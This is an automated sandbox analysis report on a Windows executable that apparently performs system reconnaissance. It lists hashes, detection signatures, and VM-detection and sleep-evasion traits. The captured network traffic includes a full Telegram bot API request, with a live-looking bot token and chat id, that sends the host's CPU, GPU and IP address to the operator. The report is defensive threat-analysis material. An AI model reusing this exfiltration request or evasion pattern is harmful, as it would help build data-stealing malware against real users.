Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xYWm6BV3NZ.exe

Overview

General Information

Sample Name:xYWm6BV3NZ.exe
Analysis ID:567681
MD5:166c72239b76c7f2dcd5cb02138adc42
SHA1:738654027847e49909f1180c147f79c80acb947f
SHA256:013f6b8faad5ceefe26e0817e770031e6df82da64e1b38dc4299b9bf55ba731a
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Uses the Telegram API (likely for C&C communication)
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sample file is different than original file name gathered from version info
May sleep (evasive loops) to hinder dynamic analysis
Binary contains a suspicious time stamp
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • xYWm6BV3NZ.exe (PID: 4400 cmdline: "C:\Users\user\Desktop\xYWm6BV3NZ.exe" MD5: 166C72239B76C7F2DCD5CB02138ADC42)
    • conhost.exe (PID: 4984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
xYWm6BV3NZ.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security

    There are no malicious signatures, click here to show all signatures.

    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Users\user\Desktop\xYWm6BV3NZ.exe, QueryName: ip-api.com

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: xYWm6BV3NZ.exeReversingLabs: Detection: 69%
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2
    Source: xYWm6BV3NZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: Binary string: \Amongus\Amongus\obj\Debug\Amongus.pdb source: xYWm6BV3NZ.exe

    Networking

    barindex
    Source: unknownDNS query: name: api.telegram.org
    Source: C:\Users\user\Desktop\xYWm6BV3NZ.exeDNS query: name: ip-api.com
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: global trafficHTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /line?fields=query HTTP/1.1Host: ip-api.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367818391.00000000031B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367587681.00000000012F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmp, xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
    Source: xYWm6BV3NZ.exeString found in binary or memory: http://ip-api.com/line?fields=query
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367800472.0000000003196000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4m(
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367791831.000000000318C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
    Source: xYWm6BV3NZ.exeString found in binary or memory: https://api.telegram.org/bot
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=17049
    Source: xYWm6BV3NZ.exe, 00000000.00000002.367808252.000000000319E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4m
    Source: unknownDNS traffic detected: queries for: ip-api.com
    Source: global trafficHTTP traffic detected: GET /bot2026552572:AAHsPVE1-XE3QqnTTeDfJ5cBY-LRzVYRfSY/sendMessage?chat_id=1704933594&text=CPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%202F7CW8A1%0AIP:%20102.129.143.61 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /line?fields=query HTTP/1.1Host: ip-api.comConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49758 version: TLS 1.2